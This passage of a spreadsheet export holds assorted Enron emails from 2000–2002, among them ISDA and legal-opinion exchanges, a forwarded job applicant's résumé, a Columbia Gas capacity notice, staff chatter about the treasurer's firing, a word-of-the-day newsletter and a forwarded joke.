Glencore Ltd. and Enron Capital &amp;Trade Resources Corp.  Please give me a call _x000D_
if you have any questions (713-345-7894).  Frank_x000D_
_x000D_
 &lt;&lt; File: glencore amendment.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 02:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Weyerhaeuser Co.</t>
  </si>
  <si>
    <t xml:space="preserve">There should be a clean copy of the Agreement in the file.  We blacklined it _x000D_
against the existing agreement with Weyerhaeuser Company Limited and such _x000D_
blackline is also in the file.  If there is not a clean copy of the new _x000D_
agreement, let me know and I'll print out another one._x000D_
_x000D_
_x000D_
From: Sara Shackleton@ECT on 02/12/2001 10:40 AM_x000D_
To: Stephanie Panus/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Weyerhaeuser Co._x000D_
_x000D_
Stephanie:  The fax that you gave to me with this file states that the CP _x000D_
wants to change jurisdiction "back to New York."  I don't see a prior draft; _x000D_
only a blackline against a Weyerhaeuser Company LImited document, the latter _x000D_
ISDA having been executed in June, 2000.  Does his question refer to that _x000D_
executed master?_x000D_
If so, please let me know what we agreed to.  Thanks.  _x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 03:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">They have a financing out in the letter agreement.  We have to use _x000D_
commercially reasonable efforts to deliver GE consents, but I don't recall _x000D_
anything about in other financing docs._x000D_
_x000D_
Is someone in the dept designated as the opinion reviewer?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Sheila Tweed@ECT on 04/06/2001 10:19 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Pegasus: ENA Consent and Legal Opinion  _x000D_
_x000D_
I guess I'm not sure I know what's in the letter agreement.  If it's a done _x000D_
deal, I'd say no or at least maybe.  We only give due authority opinions and _x000D_
we try to narrow our obligations to lenders under Consent Agreements_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	04/06/2001 09:15 AM_x000D_
		 _x000D_
		 To: Sheila Tweed/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Pegasus: ENA Consent and Legal Opinion_x000D_
_x000D_
Nice touch, sending this the day after the letter agreement was signed.  Can _x000D_
you enlighten me on the ENA procedures and sensitivities to these types of _x000D_
docs?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/06/2001 09:14 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"PARKER, Isabel" &lt;isabel.parker@freshfields.com&gt; on 04/06/2001 09:07:25 AM_x000D_
To: "Carolyn Campbell (E-mail)" &lt;CCampbell@KSLAW.com&gt;, "John Keffer (E-mail)" _x000D_
&lt;JKeffer@KSLAW.com&gt;, "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt;, "Rick Vicens _x000D_
(E-mail)" &lt;rvicens@deltapower.com&gt;, "Gregory F. Lang (E-mail)" _x000D_
&lt;gregorylang@paulhastings.com&gt;_x000D_
cc: "John Tisdale (E-mail)" &lt;jtisdale@jhancock.com&gt;, "Dan Revers (E-mail)" _x000D_
&lt;drevers@arclightcapital.com&gt;, "Amy Weed (E-mail)" &lt;aweed@jhancock.com&gt;, _x000D_
"BURKE, Ted (TDB)" &lt;ted.burke@freshfields.com&gt; _x000D_
_x000D_
Subject: Pegasus: ENA Consent and Legal Opinion_x000D_
_x000D_
_x000D_
This e-mail is confidential and may well also be legally privileged. If you _x000D_
have received it in error, you are on notice of its status.  Please notify us _x000D_
immediately by reply e-mail and then delete this message from your system.  _x000D_
Please do not copy it or use it for any purposes, or disclose its contents to _x000D_
any other person:  to do so could be a breach of confidence.  Thank you for _x000D_
your co-operation.  Please contact our_x000D_
IT Helpdesk on +44 (0) 20 7936 4000 Ext.2000 or email ITHelp@freshfields.com _x000D_
if you need assistance._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We understand that the Letter Agreement is to be signed today, and attach_x000D_
for your comments a form of ENA consent to collateral assignment of the_x000D_
Letter Agreement and a form of legal opinion to be issued by in-house_x000D_
counsel to ENA.  Both documents are conditions precedent to funding._x000D_
_x000D_
Kind regards_x000D_
Isabel_x000D_
_x000D_
_x000D_
 - NY003700425.DOC_x000D_
 - NY003699617.DOC_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 12:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.virgo@enron.com', 'wayne.mays@enron.com'})</t>
  </si>
  <si>
    <t>Experienced Power Plant Developer/Director of E &amp; C</t>
  </si>
  <si>
    <t xml:space="preserve">Bob/Wayne:_x000D_
_x000D_
We need to constantly upgrade our talent pool.  Does the attached candidate=_x000D_
=20_x000D_
look better than any of the engineers we have?  If so, lets bring him in to=_x000D_
=20_x000D_
talk.   If not let me know and I will take care of a response. =20_x000D_
_x000D_
If you want to give him a shot, we can bring him in on a 6 month trial basi=_x000D_
s=20_x000D_
and either: (i) keep him in place of one of our existing engineers, or (ii)=_x000D_
=20_x000D_
not renew his contract.  Let me know._x000D_
_x000D_
Regards,_x000D_
Brian_x000D_
_x000D_
---------------------- Forwarded by Brian Redmond/HOU/ECT on 12/12/2000 07:=_x000D_
59=20_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
David W Delainey_x000D_
12/12/2000 07:22 PM_x000D_
To: Brian Redmond/HOU/ECT@ECT, Dan Leff/HOU/EES@EES_x000D_
cc: =20_x000D_
Subject: Experienced Power Plant Developer/Director of E &amp; C_x000D_
_x000D_
FYI - action is required._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/12/2000=_x000D_
=20_x000D_
07:22 PM ---------------------------_x000D_
_x000D_
_x000D_
Kevin Hannon@ENRON COMMUNICATIONS on 12/12/2000 06:00:02 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: =20_x000D_
Subject: Experienced Power Plant Developer/Director of E &amp; C_x000D_
_x000D_
FYI_x000D_
_x000D_
Kevin_x000D_
_x000D_
----- Forwarded by Kevin Hannon/Enron Communications on 12/12/00 05:56 PM=_x000D_
=20_x000D_
-----_x000D_
_x000D_
=09winter_calvert@hotmail.com_x000D_
=0912/12/00 02:43 PM_x000D_
=09=09=20_x000D_
=09=09 To: Kevin.P.Hannon@enron.com, Kevin.Hannon@enron.com_x000D_
=09=09 cc: (bcc: Kevin Hannon/Enron Communications)_x000D_
=09=09 Subject: Experienced Power Plant Developer/Director of E &amp; C_x000D_
_x000D_
_x000D_
Thanks for your consideration._x000D_
_x000D_
_x000D_
WC_x000D_
_x000D_
- - - - - -  - - - - - - - - - - - - - - - - - - - - - - - - - - -_x000D_
_x000D_
WINTER O. CALVERT_x000D_
920-1/2 Knox Street, Houston, TX  77007_x000D_
713/880-3501_x000D_
_x000D_
_x000D_
_x000D_
EXECUTIVE PROFILE_x000D_
_x000D_
Fourteen successful years of executive, management, and technical experienc=_x000D_
e=20_x000D_
as Director of Project Development, Director of Engineering &amp; Construction,=_x000D_
=20_x000D_
Program Manager, Chief Engineer, and Project Engineer._x000D_
_x000D_
Combine management talents with extensive technical knowledge of=20_x000D_
construction for large projects.  Assisted in startup &amp; commissioning of 23=_x000D_
=20_x000D_
power plants, worldwide._x000D_
_x000D_
Knowledgeable of international negotiation techniques and business=20_x000D_
development._x000D_
_x000D_
Successfully negotiate the details of complex projects._x000D_
_x000D_
Thoroughly experienced in hand-picking project team members._x000D_
_x000D_
_x000D_
EXPERIENCE_x000D_
_x000D_
MCN Energy, Houston, TX         04/98 =01) 07/00_x000D_
DIRECTOR, PROJECT DEVELOPMENT_x000D_
Lead all Southern U.S. project development activities for power projects,=_x000D_
=20_x000D_
including ties to corporate gas sales and energy marketing division._x000D_
o   Team leader to financial close =01) U.S. power project =01) 140 MW._x000D_
o   Negotiated EPC (engineering &amp; construction) contracts for two_x000D_
         U.S. projects._x000D_
o   Asset Director for 2 U.S. projects under construction._x000D_
o   Extensive business contacts in industry, including developers,_x000D_
         manufacturers, &amp; consultants._x000D_
_x000D_
Amoco Power, Houston, TX      07/96 =01) 04/98_x000D_
DIRECTOR, ENGINEERING &amp; CONSTRUCTION_x000D_
Team member/leader for technical and commercial negotiations for power=20_x000D_
projects of 100 to 1500 MW._x000D_
o   Lead all engineering efforts for development projects in:_x000D_
   -   Brazil      -   Bolivia_x000D_
   -   Venezuela   -   Russia_x000D_
   -   Argentina   -   Puerto Rico_x000D_
o   Developed familiarity with country laws and regulations_x000D_
         concerning power generation assets._x000D_
o   Co-author of book on Cogeneration Management._x000D_
o   Participated on Task Force to develop worldwide markets for LNG_x000D_
         and NGLs._x000D_
_x000D_
GE (S &amp; S Energy Products), Houston, TX         12/91 - 07/96_x000D_
PROGRAM MANAGER_x000D_
o   Managed technical support team for sale of GE gas turbines in_x000D_
         Sales Group._x000D_
o   Delivered sales presentations; prepared proposals; worked_x000D_
         closely with manufacturers._x000D_
o   Extensive international travel._x000D_
LEAD MECHANICAL ENGINEER_x000D_
o   Assisted in startup and commissioning of 23 power plants,_x000D_
         worldwide._x000D_
_x000D_
EDUCATION_x000D_
_x000D_
Stanford University,  Stanford, CA_x000D_
Master of Science Degree / Mechanical Engineering  -  1986_x000D_
_x000D_
Texas A &amp; M University,  College Station, TX_x000D_
Bachelor of Science Degree / Aerospace Engineering  -  1984_x000D_
_x000D_
Rice University,  Houston, TX_x000D_
Executive Development Program  -  1997_x000D_
_x000D_
Licensure:  Registered Professional Engineer, State of Texas_x000D_
Member:  American Management Association_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________________________________=_x000D_
____x000D_
________x000D_
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.co=_x000D_
m_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 08:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Outstanding Invoices</t>
  </si>
  <si>
    <t xml:space="preserve">In an effort to bring incremental revenue for our pipeline, I researched _x000D_
outstanding invoices generated from facility interconnects, etc.  _x000D_
Transwestern currently has no outstanding dollars to collect.  However, there _x000D_
appears to be $600,000 that can be collected on Northern Natural in addition _x000D_
to $250,000 that was written off.  Attached are the spreadsheets from _x000D_
Accounts Receivable._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 05:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Lola -_x000D_
_x000D_
You know that I wouldn't be asking you this but this is ONLY if  it's _x000D_
possible.  Some how I've gotten myself into a crunch and I need to know if I _x000D_
can get some money from you.  I'm not quite sure of what our balance is but _x000D_
is there any way I can get $40 or $50 from you?  My electric bill is $320 and _x000D_
it was due yesterday.  I called them and told them that I could pay half b/c _x000D_
my car note is due this pay period too.  Let me know if you can help.</t>
  </si>
  <si>
    <t>Thu, 8 Nov 2001 10:36:09 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: From Bloomberg</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Many expletives deleted!  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hall, Steve C. (Legal)  _x000D_
Sent:	Thursday, November 08, 2001 10:35 AM_x000D_
To:	Yoder, Christian_x000D_
Cc:	Sager, Elizabeth_x000D_
Subject:	RE: From Bloomberg_x000D_
_x000D_
CNNMoney is reporting this news as "Enron fires treasurer, general counsel." _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Yoder, Christian  _x000D_
Sent:	Thursday, November 08, 2001 10:31 AM_x000D_
To:	Hall, Steve C. (Legal)_x000D_
Cc:	Sager, Elizabeth_x000D_
Subject:	RE: From Bloomberg_x000D_
_x000D_
I am sorely tempted to venture into remarks that would be unbecoming of the professional ethics I am sworn to uphold.  This is like being in the Oregon State penitentiary and finding out the prisoner down the cell block is a child molester.  The regular inmates have ways of dealing with this particular kind of specie. Every morning,  our whole reason for walking into the building that houses the business establishment we toil for  is about not letting our business hubris get out of legal and ethical control, and now, we see this.  One of our own crossed the line, a line that seems so dark and vivid now, but which, in the back rooms full of   illusions of omnipotence, and what one's imagination is constrained to not crystalize as the image of literal dope smoking,  seemed to be such an insignificant little technicality.  This is a dark and wretched day for our profession. ---cgy  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hall, Steve C. (Legal)  _x000D_
Sent:	Thursday, November 08, 2001 10:09 AM_x000D_
To:	Yoder, Christian_x000D_
Subject:	From Bloomberg_x000D_
_x000D_
Enron fired Treasurer Ben Glisan and Kristina Mourdant, a lawyer for an Enron division. The company ``now believes'' Glisan, Mourdant and two other employees no longer working for Enron bought interests in subsidiaries of a partnership run by former Chief Financial Officer Andrew Fastow. </t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 07:32:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: REVISED - CAPACITY UPDATE EFFECTIVE FOR MONDAY, JUNE 4, 2001</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	navigator@nisource.com@ENRON [mailto:IMCEANOTES-navigator+40nisource+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Friday, June 01, 2001 5:09 AM_x000D_
To:	navigator@nisource.com_x000D_
Subject:	REVISED - CAPACITY UPDATE EFFECTIVE FOR MONDAY, JUNE 4, 2001_x000D_
_x000D_
_x000D_
                      COLUMBIA GAS TRANSMISSION CORPORATION_x000D_
                        NOTICE TO ALL INTERESTED PARTIES_x000D_
                                  JUNE 01, 2001_x000D_
_x000D_
Notice ID: 2771_x000D_
5 - NO RESPONSE REQUIRED_x000D_
_x000D_
SUBJECT: REVISED - CAPACITY UPDATE EFFECTIVE FOR MONDAY, JUNE 4, 2001_x000D_
_x000D_
             CHANGES ARE INDICATED WITH AN *_x000D_
_x000D_
Effective Monday, June 4, 2001, capacities will be as follows:_x000D_
_x000D_
Excess MDWQ              Available +_x000D_
ISS Withdrawals          Available_x000D_
SIT Withdrawals          Available_x000D_
Imbalance Drawdowns      Available_x000D_
PAL Lends/Unparks        Available_x000D_
_x000D_
Excess MDIQ              Not Available +_x000D_
ISS Injections           Not Available_x000D_
SIT Injections           Not Available_x000D_
Imbalance Paybacks       Not Available_x000D_
PAL Parks/Loan Paybacks  Not Available_x000D_
_x000D_
+ Call Gas Control 24 hours in advance at (304) 357-2606 to request approval._x000D_
_x000D_
Receipt capacity will be as follows:_x000D_
_x000D_
TENNESSEE:_x000D_
_x000D_
Brinker (B12)            20,000_x000D_
Broad Run (B9)          450,000_x000D_
Cambridge (B10)          10,000_x000D_
Dungannon (B11)          40,000_x000D_
Highland (B17)           25,000_x000D_
Milford (B18)            30,000_x000D_
North Greenwood (B22)    10,000_x000D_
Unionville (B15)         75,000_x000D_
_x000D_
TEXAS EASTERN:_x000D_
_x000D_
Delmont (C16)                 0_x000D_
Eagle (C22)              30,000_x000D_
Hooker (C9)              25,000_x000D_
Pennsburg (C23)          50,000_x000D_
Windridge (C12)          60,000_x000D_
_x000D_
NATIONAL FUEL:_x000D_
_x000D_
Independence (M1)        10,000_x000D_
Ellwood City (L1)        10,000_x000D_
_x000D_
TRANSCO:_x000D_
_x000D_
Downingtown (E3)          5,000_x000D_
Emporia I (E13)         120,000 *_x000D_
Rockville (E2)           65,000_x000D_
Dranesville (E1)         25,000_x000D_
_x000D_
ALGONQUIN:_x000D_
_x000D_
Ramapo (R1)              50,000_x000D_
_x000D_
ANR:_x000D_
_x000D_
Paulding/Cecil          100,000_x000D_
(F1, A2)_x000D_
_x000D_
LEBANON AGGREGATE       225,000_x000D_
(A4, F2, C4, D3)_x000D_
_x000D_
TOLEDO AGGREGATE        225,000_x000D_
(A3, F4, 734462)_x000D_
_x000D_
COLUMBIA GULF:_x000D_
(801)_x000D_
_x000D_
TCO-Leach             2,218,000_x000D_
_x000D_
Internal point non-firm capacity will be as follows:_x000D_
_x000D_
Lanham                No Restrictions_x000D_
_x000D_
Delivery capacity (non-firm) will be as follows:_x000D_
_x000D_
TRANSCO:_x000D_
_x000D_
Martins Creek (MA 21)    25,000_x000D_
Young Woman's Creek       5,000_x000D_
   (MA 36)_x000D_
_x000D_
ALGONQUIN:_x000D_
_x000D_
Hanover (MA 22)         143,000_x000D_
_x000D_
EQUITRANS:_x000D_
_x000D_
Fallen Timber (MA 35)    35,000_x000D_
(MLI K1)_x000D_
_x000D_
Waynesburg-Rhinehart     30,000_x000D_
(MA 26) (MLI K2)_x000D_
_x000D_
OPT-30 will be available in all market areas._x000D_
OPT-60 will be available in all market areas._x000D_
_x000D_
Market Area delivery capacity (non-firm) will be as follows:_x000D_
_x000D_
Operating Area 1_x000D_
     Market Area 33       No Restrictions_x000D_
     Market Area 34       No Restrictions_x000D_
_x000D_
Operating Area 2_x000D_
     Market Area 20       No Restrictions_x000D_
_x000D_
Operating Area 3_x000D_
     Market Area 15       No Restrictions_x000D_
     Market Area 16       No Restrictions_x000D_
     Market Area 17       No Restrictions_x000D_
     Market Area 18       No Restrictions_x000D_
     Market Area 19       No Restrictions_x000D_
_x000D_
Operating Area 4_x000D_
     Market Area 21       No Restrictions_x000D_
     Market Area 22       No Restrictions_x000D_
     Market Area 23       No Restrictions_x000D_
     Market Area 24       No Restrictions_x000D_
     Market Area 25       No Restrictions_x000D_
     Market Area 29       No Restrictions_x000D_
_x000D_
Operating Area 5_x000D_
     Market Area 02       No Restrictions_x000D_
     Market Area 07       No Restrictions_x000D_
_x000D_
Operating Area 6_x000D_
     Market Area 10       No Restrictions_x000D_
     Market Area 11       No Restrictions_x000D_
     Market Area 12       No Restrictions_x000D_
     Market Area 13       No Restrictions_x000D_
     Market Area 14       No Restrictions_x000D_
_x000D_
Operating Area 7_x000D_
     Market Area 01       No Restrictions_x000D_
     Market Area 03       No Restrictions_x000D_
     Market Area 04       No Restrictions_x000D_
     Market Area 05       No Restrictions_x000D_
     Market Area 06       No Restrictions_x000D_
     Market Area 08       No Restrictions_x000D_
     Market Area 09       No Restrictions_x000D_
_x000D_
Operating Area 8_x000D_
     Market Area 26       No Restrictions_x000D_
     Market Area 27       No Restrictions_x000D_
     Market Area 32       No Restrictions_x000D_
     Market Area 35       No Restrictions_x000D_
     Market Area 36       No Restrictions_x000D_
     Market Area 38       No Restrictions_x000D_
     Market Area 39       No Restrictions_x000D_
     Market Area 40       No Restrictions_x000D_
_x000D_
Operating Area 10_x000D_
     Market Area 28       No Restrictions_x000D_
     Market Area 30       No Restrictions_x000D_
     Market Area 31       No Restrictions_x000D_
_x000D_
If you have any questions, please contact your Account_x000D_
Representative.</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 05:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>promotion for Martin Lin</t>
  </si>
  <si>
    <t>Sheila,_x000D_
_x000D_
A reminder about promoting Martin Lin from associate to manager.   Do we have _x000D_
any leeway on his salary adjustment?   He is currently at 81K, and I _x000D_
understand that his new salary can be made retroactive to Aug. 1, 2000._x000D_
_x000D_
thanks,_x000D_
_x000D_
Stinson</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 12:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PRC mistake</t>
  </si>
  <si>
    <t>Steve,_x000D_
_x000D_
When filling out the feedback form I misread you as my supervisor and I _x000D_
filled out the form referring to you.  I said pretty good things about you,  _x000D_
you should not, repeat SHOULD NOT believe what I said.  I was just trying to _x000D_
help you out with your supervisor._x000D_
_x000D_
Regarding  Rick.  I can tell you that I respect him very much.  He has shown _x000D_
signs of friendship beyond of what I expected.  You know that I was not very _x000D_
happy with my past review but I never doubted that Rick did the best he could _x000D_
given the information that he had.  I never doubted his integrity or _x000D_
qualifications._x000D_
_x000D_
Rick is an outstanding leader and manager.  He has the ability of managing a _x000D_
large and diverse group of people effectively and with no one ever feeling _x000D_
any pressure, arrogance, etc._x000D_
_x000D_
Steve,  you have a great team which I have already started to miss._x000D_
_x000D_
Best,_x000D_
_x000D_
Ricardo</t>
  </si>
  <si>
    <t>Sun, 10 Mar 2002 00:57:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'doctor@dictionary.com'})</t>
  </si>
  <si>
    <t>frozenset({'wordoftheday@lists.lexico.com'})</t>
  </si>
  <si>
    <t>expatiate: Dictionary.com Word of the Day</t>
  </si>
  <si>
    <t>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=_x000D_
Get 5 BESTSELLERS FOR $1 + A FREE ATTACHE CASE with _x000D_
membership to The Book-of-the-Month Club(R). Save on your _x000D_
favorites: Stephen King, James Patterson, Mary Higgins Clark, _x000D_
John Grisham, Amy Tan &amp; so many others. You?ll save on all _x000D_
the "must read" books! Click for details._x000D_
http://by.advertising.com/1/c/62072/33364/155726/155726_x000D_
_x000D_
&lt;a href="http://by.advertising.com/1/c/62072/33364/155726/155726"&gt; _x000D_
AOL users click here &lt;/a&gt;_x000D_
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=_x000D_
_x000D_
_x000D_
   Word of the Day for Sunday March 10, 2002:_x000D_
_x000D_
   expatiate \ek-SPAY-shee-ayt\, intransitive verb:_x000D_
   1. To speak or write at length or in considerable detail._x000D_
   2. To move about freely; to wander._x000D_
_x000D_
     He  had  told  her all he had been asked to tell--or all he_x000D_
     meant  to  tell:  at  any  rate  he had been given abundant_x000D_
     opportunity   to  expatiate  upon  a  young  man's  darling_x000D_
     subject--himself._x000D_
     --Henry Blake Fuller, Bertram Cope's Year_x000D_
_x000D_
     At  the  midday  meal  on fair day, a large one (meat loaf,_x000D_
     boiled  potato,  broccoli),  Mrs. Lucas, married to the man_x000D_
     with  the earache, expatiates on the difficulties of caring_x000D_
     for  a  parakeet  her  daughter  has  unloaded upon her and_x000D_
     which,  let  out  of  its  cage  for an airing, has escaped_x000D_
     through the door suddenly opened by Mr. Lucas._x000D_
     --William H. Pritchard, Updike: America's Man of Letters_x000D_
_x000D_
     His  relationship  with  his  family  was for many years an_x000D_
     unhappy one, and he does not care to expatiate upon it._x000D_
     --Barbara  La  Fontaine, "Triple Threat On, Off And Off-Off_x000D_
     Broadway," [1]New York Times, February 25, 1968_x000D_
     __________________________________________________________x000D_
_x000D_
   Expatiate  is  from  Latin  expatiari,  "to walk or go far and_x000D_
   wide,"  from  ex-,  "out"  +  spatiari,  "to walk about," from_x000D_
   spatium, "space; an open space, a place for walking in."_x000D_
_x000D_
References_x000D_
_x000D_
   1. http://www.nytimes.com/_x000D_
_x000D_
_x000D_
_._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.__x000D_
_x000D_
You are currently subscribed to Dictionary.com Word of the Day as: _x000D_
matt.motley@enron.com_x000D_
_x000D_
To subscribe to the list by email, send a blank message to:_x000D_
join-WordoftheDay@lists.lexico.com_x000D_
_x000D_
To unsubscribe via email, send a blank message to:_x000D_
leave-wordoftheday-357530C@lists.lexico.com_x000D_
_x000D_
Subscriptions can be turned on and off from the Web at_x000D_
http://www.dictionary.com/wordoftheday/list/_x000D_
_x000D_
Dictionary.com Word of the Day_x000D_
http://www.dictionary.com/wordoftheday/_x000D_
(C) 2002 by Lexico Publishing Group, LLC.</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 11:31:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting- Friday, June 8</t>
  </si>
  <si>
    <t>_x000D_
3:00-4:00-Future of Commodity Fundamentals Meeting in EB3269.</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 06:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>hi there</t>
  </si>
  <si>
    <t>I may go home and work after I take Michael.  I'll call.</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 10:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Summer part time employee</t>
  </si>
  <si>
    <t xml:space="preserve">Add her to the distribution list for associate social functions._x000D_
---------------------- Forwarded by Celeste Roberts/HOU/ECT on 06/23/2000 _x000D_
05:06 PM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
06/23/2000 09:56 AM_x000D_
To: Celeste Roberts/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Elena Chilkina/Corp/Enron@Enron, Mike A _x000D_
Roberts/HOU/ECT@ECT _x000D_
Subject: Summer part time employee_x000D_
_x000D_
Celeste,_x000D_
_x000D_
I have talked to you last evening about Elena Chilkina,_x000D_
an MBA Rice student who works for us part-time during the academic year,_x000D_
and full time this summer. _x000D_
_x000D_
She asked if she could participate in the program for summer associates._x000D_
(presentations, social meetings),_x000D_
_x000D_
I would appreciate if you could help her._x000D_
_x000D_
Vince _x000D_
</t>
  </si>
  <si>
    <t>Sun, 28 Oct 2001 20:23:31 -0800 (PST)</t>
  </si>
  <si>
    <t>Sat, 9 Dec 2000 03:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'acahanchian@zdnetonebox.com'})</t>
  </si>
  <si>
    <t>frozenset({'lulujap@hotmail.com', 'tyrell.harrison@enron.com', 'amirco@email.msn.com', 'jwiseman@newregency.com', 'brian.hoskins@enron.com', 'jpcary96@hotmail.com', 'orenmax@hotmail.com', 'dganc@yahoo.com', 'dandelionwine1@hotmail.com', 'jared_haun@yahoo.com', 'aja08@hotmail.com', 'jefflerner@aol.com', 'suresh_vasan@enron.net', 'eric.bass@enron.com', 'jewelsno1@aol.com', 'bird3397@yahoo.com', 'btmazumdar@zdnetonebox.com', 'vemarie@hotmail.com'})</t>
  </si>
  <si>
    <t>Fwd: Lifesavers</t>
  </si>
  <si>
    <t xml:space="preserve">--_x000D_
Amir Cyrus Ahanchian_x000D_
acahanchian@zdnetonebox.com - email_x000D_
(512) 682-6996 ext. 1087 - voicemail/fax_x000D_
_x000D_
_x000D_
_x000D_
____________________________________________________________________x000D_
To get your own FREE ZDNet Onebox - FREE voicemail, email, and fax,_x000D_
all in one place - sign up today at http://www.zdnetonebox.com_x000D_
_x000D_
Return-Path: &lt;moranito@hotmail.com&gt;_x000D_
Received: from hotmail.com ([216.33.149.39]) by mta10.onebox.com          _x000D_
(InterMail vM.4.01.03.00 201-229-121) with ESMTP          id _x000D_
&lt;20001208171048.VMYZ10692.mta10.onebox.com@hotmail.com&gt;          for _x000D_
&lt;acahanchian@zdnetmail.com&gt;; Fri, 8 Dec 2000 09:10:48 -0800_x000D_
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;  _x000D_
Fri, 8 Dec 2000 09:10:48 -0800_x000D_
Received: from 165.95.229.162 by lw4fd.law4.hotmail.msn.com with HTTP; Fri, _x000D_
08 Dec 2000 17:10:46 GMT_x000D_
X-Originating-IP: [165.95.229.162]_x000D_
From: "Alvaro Moran" &lt;moranito@hotmail.com&gt;_x000D_
To: abe_77@hotmail.com, aileen_newman@hotmail.com, ajmoran@globalpc.net, _x000D_
acahanchian@zdnetmail.com, corinnewa@hotmail.com, espinosasonia@hotmail.com, _x000D_
estebanjs@hotmail.com, gaby_elizondo@hotmail.com, irma@garcialks.com, _x000D_
joe_tiger@hotmail.com, kbacker@hotmail.com, MMORAN1970@aol.com, _x000D_
morancova@hotmail.com, rayloz25@yahoo.com, nbarberena@hotmail.com, _x000D_
nghiatn@hotmail.com, roberto_rendon@hotmail.com, tita_padilla@hotmail.com, _x000D_
kongvv@hotmail.com, veronica@monte-mayor.com, vidal7@hotmail.com, _x000D_
wicho45@hotmail.com, yvonne@monte-mayor.com_x000D_
Subject: Fwd: Fw: STILL LAUGHING HOURS LATER_x000D_
Date: Fri, 08 Dec 2000 11:10:46 -0600_x000D_
Mime-Version: 1.0_x000D_
Content-Type: text/plain; format=flowed_x000D_
Message-ID: &lt;F39yF1BcI3Em6kwViaa0000857f@hotmail.com&gt;_x000D_
X-OriginalArrivalTime: 08 Dec 2000 17:10:48.0305 (UTC) _x000D_
FILETIME=[CF2A2610:01C06139]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
bttoven@hotmail.com, santiagolozanog@hotmail.com, chiva63@aol.com,_x000D_
marcossalazar@hotmail.com, jorgegarcialara@yahoo.com.mx,_x000D_
rmoran@academicplanet.com_x000D_
&gt;Subject: Fwd: Fw: STILL LAUGHING HOURS LATER_x000D_
&gt;Date: Thu, 07 Dec 2000 18:09:58 -0600_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
This is Funny!_x000D_
_x000D_
A man was doing a study of children's senses in a_x000D_
first-grade class using Lifesaver candies .  He would ask them to_x000D_
identify the color and then the flavor as they tasted the Lifesaver._x000D_
The children began to say,_x000D_
_x000D_
"Red...cherry"_x000D_
"Yellow...lemon"_x000D_
"Green...lime"_x000D_
"Orange...orange"_x000D_
_x000D_
Finally, he gave them all honey flavored Lifesavers. The_x000D_
children sucked on them for a while, but they couldn't decipher the_x000D_
taste. "Well" he said, "I'll give you a clue.  It's what your_x000D_
mother would call your father!" One little girl looked up in horror.  She_x000D_
quickly spit the  Lifesaver out and shouted, "Everybody, spit it out._x000D_
They're assholes!"_x000D_
_x000D_
_______________________________________________________________________________x000D_
________x000D_
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com_x000D_
